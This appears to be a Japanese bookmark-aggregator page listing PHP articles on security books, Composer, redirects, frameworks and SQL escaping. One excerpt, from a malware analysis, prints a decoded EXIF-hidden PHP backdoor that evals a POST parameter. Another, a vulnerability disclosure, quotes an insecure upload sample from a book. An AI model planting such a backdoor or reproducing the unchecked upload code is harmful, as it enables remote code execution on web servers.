PHP7で変わること ——言語仕様とエンジンの改善ポイントRuby FFIについての解説 Shinjuku.rb #50 PyCallを中心に機械学習やFFIなどを勉強しよう https://shinjukurb.connpass.com/event/58526/ の発表資料です
「10日でおぼえるPHP入門教室 第4版」はセキュリティ面で高評価
弊社本社の麻布十番移転に伴い、本社近くの麻布図書館を利用しています。麻布図書館は土地柄のイメージにあう瀟洒な建物で、蔵書がない場合は港区の他の図書館から取り寄せ(無料です)ができますので、よく利用しています。今回は、山田祥寛さんの「10日でおぼえるPHP入門教室 第4版 」を借りて読んでみました。一読して、本書がセキュリティにもよく配慮されていることがわかりましたので、以下にご紹介したいと思います。 クロスサイトスクリプティング(XSS) 表示の際にHTMLエスケープするという原則を忠実に守っています。そのため、下記の e() という関数を定義して呼び出しています。 function e($str, $charset = 'UTF-8') { return htmlspecialchars($str, ENT_QUOTES, $charset); } その他にもXSS対策として重要な下記の
静的サイトジェネレータ「Phest」導入のメリット5
静的サイトジェネレータがブームだとか聞きます。 私の場合は、大変な要件が来た時になにかいい方法はないものか・・・と辿り着いたのが 静的サイトジェネレータでした。 初期に集中して構築した結果、その後の修正や運用でとてつもない工数の削減ができたので、 導入は大成功となりました。 静的サイトジェネレータですが、初期コーディングの時点でも威力を発揮しました。 ここでは初期コーディングにおいての静的サイトジェネレータのメリットを5つまとめました。 もくじ そもそも静的サイトジェネレータとは? 選ばれたのはPhestでした メリット1:同じことを複数記述しなくていい メリット2:ルールを把握しやすい メリット3:パスの設定方法が豊富 メリット4:テスト用、本番用ファイルの生成が楽 メリット5:パターンのテストが簡単にできる 最後に そもそも静的サイトジェネレータとは? 選ばれたのはPhestでした メ
Composer を倍速にした、たった 1 行のコード
まだ 12 月早々ですが、PHP ユーザに素敵なクリスマスプレゼントが届きました。 いまや使うのが当たり前となった Composer ですが、複雑な依存解決に実行時間がかかるのがネックでした。 これは日本国内だけでなく、海外のユーザも同じで、皆がしょうがないと思いつつも、小さな不満を持ちながら使っていました。 そんな、ある�日、わずか 1 行のコードが追加されたことで、実行時間が、わずか半分になるという現象が起こりました。 Composer を倍速にするには? composer self-update を実行して、最新版にするだけです。 $ composer self-update 実際の効果 このコードの効果を見てみましょう。composer コマンドの --profile オプションを使って、実行時間と使用メモリ量を出力します。 $ composer update --dry-run
『PHPのheader関数を使うときのSEO的注意点』
PHPにはheader関数というとても便利な関数があります。 これは簡単に言うとHTTPヘッダー情報を送信するという機能です。 この関数を応用するとリダイレクトのようなことができます。 具体的にはindex.phpに記述しておくと、 header("Location: http://www.domain.com/index2.php") ; と記述すると、index.phpからindex2.phpを呼び出します。つまり、index2.phpへ リダイレクトされます。 ただし、このときに注意しなければいけないことは、このままだと Moved Temporaryになるということです。 SEO的に理想とされるMoved Permanentlyにするためには header("HTTP/1.0 301 Moved Permanently") ; header("Location: http://ww
安全なPHPアプリケーションの作り方2014
Internet Week 2010 S3 今日こそわかる、安全なWebアプリの作り方2010 http://www.nic.ad.jp/iw2010/program/s3/
保守性・管理性が劇的に上がるPHPのスマートなコードの書き方12選 | BULK SERVER blog
プログラミング言語には様々なものがありますが、その中でも比較的人気なのがPHPです。PHPはHTMLファイルに直接記述できるスクリプト言語であり、その手軽さや言語自体のわかりやすさなどから、主にWebサービスの制作でその人気を獲得しています。 PHPは他の言語に比べてとても簡単な仕様となっており、初心者でもすぐにマスターすることができるものです。そして、同じプログラムを書く際でも複数の書き方が可能になっており、使用者に合わせた柔軟性も兼ね備えています。 そのような様々な書き方があるならば、なるべく手短でスマートなコードの書き方をマスターしたいものです。コードをスマートに記述することは以下のメリットがあります。 見やすくなることで保守・管理性の向上 コード量の短縮 記述時間(制作時間)の短縮 組織でのプログラミングルールの簡潔化が可能 このようにメリットが様々あるので、同じプログラムであれば
PHP界隈の胸が熱くなる話 - withgod's blog
ふとTwitterを眺めてると もうちょい日本のPHP使ってる人krakjoeの話題に関心持ってもいいと思うんだけどな。彼php-dbgとかcoreで頑張ってるし、いちOSSの出来事としてひじょーに興味深いと思う— Shuhei Tanuma (@chobi_e) July 10, 2014 とか視界に飛び込んでくる。 karkjoeつーと確かAPCuとかpthreads書いた人だよなーって思いつつ何だろうと思ってTwitter見てみるとこんなのが A leg up, please .... Click to Donate: http://t.co/vT4MczCaAk #gofundme— Joe Watkins (@krakjoe) July 9, 2014 ん?って事でリンク先を拝見 http://www.gofundme.com/b9dfcg My name is Joe Watk
2014年2月PHPフレームワークのトレンド - demouth::blog
人気のあるPHPフレームワークについて調べていたら下記の参考になる記事がありました。 2013年において注目すべき PHP フレームワークは Laravel PHPフレームワークのベンチマーク比較と2013年のトレンド 「Githubのスター数」と「Googleトレンド」という観点が面白かったので、2014年2月14日現在で調べ直してみました。 Githubのスター数 PHPのフレームワークを適当にピックアップし、GithubのStar順に並べて表にしました。 2013年4月21日時点では3,971だったLaravelのスター数が[*1]、2014年2月14日現在では8,319となり、第1位になったようです。 フレームワーク Star Watch Fork 最新リリース 備考 Laravel 8,319 1,115 2,728 v4.1.18 Symfony 7,820 750 2,930
そろそろ Simple HTML DOM Parser を使うのはやめたほうがいい - localdisk
Simple HTML DOM Parser といえば定番のスクレイピングライブラリで、僕も随分お世話になったわけだけど遅いし重いので Goutte 使ったほうがいいという話です。某サイトをスクレイピングするのに比較したら特にメモリ消費に大きな差がでました。 比較したスクリプトは Github においてありますので自由に使ってください。なおプロファイラは @koriym さんが Qiita にポストしたものを使用させていただきました。 PHPの簡単ベンチマーク プログラム スクレイピング対象のサイトはこのブログにしました。あざといですね。タイトルのリストを出力するプログラムです。 Simple HTML DOM Parser <?php require_once './vendor/autoload.php'; require_once './profiler.php'; $html =
書籍「気づけばプロ並みPHP」にリモートスクリプト実行の脆弱性
書籍「気づけばプロ並みPHP」のサンプルスクリプトにリモートスクリプト実行の脆弱性があるので報告します。 はじめに Yahoo!知恵袋の質問を読んでいたら、以下の質問がありました。 気づけばプロ並みPHP (著)谷藤賢一 (発行)リックテレコムP112の画像をアップロードする機能でエラーがでます。 http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q11119835496 より引用 質問に対しては回答が既についてクローズされていましたが、引用されているソースを見て任意のファイルを任意のファイル名で、Web公開ディレクトリにアップロードできることに気づきました(下記)。 <?php // 略 $pro_gazou=$_FILES['gazou']; // 略 if($pro_gazou['size']>0) { if ($pro_
メタデータに埋め込まれたマルウエア
今回は攻撃者による“だまし”に関するブログを中心に紹介する。最初は、JPEG画像のメタデータにマルウエアを仕込むケース。JPEG画像のメタデータにマルウエアを仕込んだPHPバックドアをスペインのドメイン(.es)で見つけたとして、ブログで注意を促している。同様の手口は、今年6月に米スキュリが報告している。 JPEGファイルのコードを見ると興味深い文字列が並んでおり、画像のEXIFデータと合致する。 JPEGファイルのコード 画像のEXIFデータ EXIFデータのModelo(モデル)情報とMarca(メーカー)情報に同じ文字列が確認できる。これを解読すると「if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"])); 」となり、POSTパラメータ「zz1」を通じて取得するいかなる数値も実行する。 コードの実行には、PHPの「ex
WebPay: 開発者向けクレジットカード決済サービス
ドメインウェブの設定が見つかりません 考えられる原因 ドメインウェブの設定がまだ行われていない。 ドメインウェブの設定がまだ反映されていない。(反映には数時間~24時間かかることがあります) ドメインウェブ・DNSの設定が誤っている。 アカウントが存在しない、契約が終了している、削除されている。
PHPとセキュリティの解説書12種類を読んでSQLエスケープの解説状況を調べてみた
この投稿はPHP Advent Calendar 2013の13日目の記事です。昨日は@tanakahisateruのPHPが糞言語なのはどう考えても参照をポインタだと思っているお前らが悪いでした。 現在twitterのタイムラインで、史上空前のSQLのエスケープブームが起こっています。 オレオレSQLセキュリティ教育は論理的に破綻している | yohgaki's blog 「プリペアードクエリが基本だけど、動的に SQL を組み立てる場合もあるから、そういう場合に備えてエスケープも知っておいたほうがいいかも」 - Togetterまとめ エスケープとプレースホルダをめぐる議論 - Togetterまとめ SQLインジェクション対策としてのプリペアドステートメントとエスケープについての議論 - Togetterまとめ IPAの「安全なSQLの呼び出し方」が安全になっていた | yohgak
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
GitHub - scotch-io/scotch-box: Scotch Box is a preconfigured Vagrant Box with a full array of LAMP Stack features to get you up and running with Vagrant in no time.
1000万ダウンロードアプリ『メルカリ』を支える技術
開発用ローカルサーバを立ち上げる方法 - Qiita
x.com
TechCrunch | Startup and Technology News
GitHub - demouth/DmGeocoder: ジオコーディングライブラリ | Geocoding library.
